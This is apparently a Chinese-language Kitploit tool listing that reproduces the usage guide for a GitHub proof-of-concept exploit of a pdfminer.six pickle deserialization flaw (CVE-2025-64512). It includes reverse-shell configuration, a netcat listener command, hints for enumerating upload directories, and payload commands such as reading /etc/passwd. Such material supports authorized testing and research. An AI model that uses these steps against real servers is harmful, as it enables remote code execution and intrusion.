Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-64512 — 用于CVE-2025-64512的漏洞利用,可获取反弹Shell。 | Kitploit
工具/GitHubGitHub/stoic-crawler/cve-2025-64512
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubstoic-crawler/cve-2025-64512

CVE-2025-64512

用于CVE-2025-64512的漏洞利用,可获取反弹Shell。

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-64512 – pdfminer.six 反序列化 PoC

概述

此概念验证演示了 pdfminer.six(CVE-2025-64512)中的一个漏洞,在处理恶意 PDF 时可能导致任意命令执行。该漏洞利用程序使用一个构造的 PDF,引用恶意的 gzip 压缩 Python pickle 文件。当存在漏洞的应用程序解析该 PDF 时,它会加载 pickle 并执行其中嵌入的有效载荷。

包含的 PoC 被配置为执行 Python 反向 Shell,但有效载荷可以替换为任意命令。


要求

  • Python 3
  • requests

安装所需依赖:

root@kitploit:~
pip install requests

配置

在运行漏洞利用程序之前,请编辑 exploit.py 的配置部分:

root@kitploit:~
BASE_URL = ""
UPLOAD_DIR = ""
LHOST = ""
LPORT = 4444

BASE_URL

存在漏洞的上传端点的 URL。

示例:

root@kitploit:~
BASE_URL = "http://target/upload.php"

该漏洞利用程序会将恶意 PDF 和压缩的 pickle 文件都上传到此端点。


UPLOAD_DIR

目标上存储上传文件的绝对目录。

示例:

root@kitploit:~
UPLOAD_DIR = "/var/www/html/uploads"

此路径被嵌入到生成的 PDF 中,并且必须与存在漏洞的应用程序稍后读取所上传 pickle 文件的位置相匹配。

如果上传目录未知,请在枚举期间确定它。根据应用程序的不同,有用的技术包括:

  • 查看应用程序源代码(如果可用)
  • 检查错误消息或堆栈跟踪
  • 查找配置文件
  • 确定上传文件从何处提供
  • 枚举可预测的上传位置
  • 适当时对可能的上传路径进行模糊测试

典型位置包括:

root@kitploit:~
/var/www/html/uploads
/var/www/uploads
/srv/www/uploads
/opt/application/uploads

正确的目录完全取决于目标应用程序。


LHOST

你的监听器 IP 地址。

示例:

root@kitploit:~
LHOST = "10.10.14.5"

LPORT

用于反向 Shell 的监听端口。

示例:

root@kitploit:~
LPORT = 4444

在运行漏洞利用程序之前启动监听器:

root@kitploit:~
nc -lvnp 4444

使用方法

运行漏洞利用程序:

root@kitploit:~
python3 exploit.py

该脚本将:

  1. 生成恶意 pickle 文件。
  2. 将其压缩为 evil.pickle.gz。
  3. 生成引用该 pickle 文件的恶意 PDF。
  4. 上传两个文件。
  5. 触发 PDF 处理。
  6. 如果目标存在漏洞,则执行有效载荷。

自定义有效载荷

除了反向 Shell,任何操作系统命令都可以通过修改传递给以下函数的命令来执行:

root@kitploit:~
create_pickle_with_cmd(command)

示例包括:

root@kitploit:~
id
whoami
uname -a
cat /etc/passwd

注意事项

  • 存在漏洞的应用程序必须使用存在漏洞的 pdfminer.six 版本来处理上传的 PDF。
  • 上传的 pickle 文件必须保持可在构造的 PDF 中所引用路径处访问。
  • 成功利用取决于目标的处理工作流和文件存储布局。

免责声明

此概念验证仅用于教育目的、安全研究和授权渗透测试。请仅对您明确获得许可进行安全测试的系统使用它。

下载工具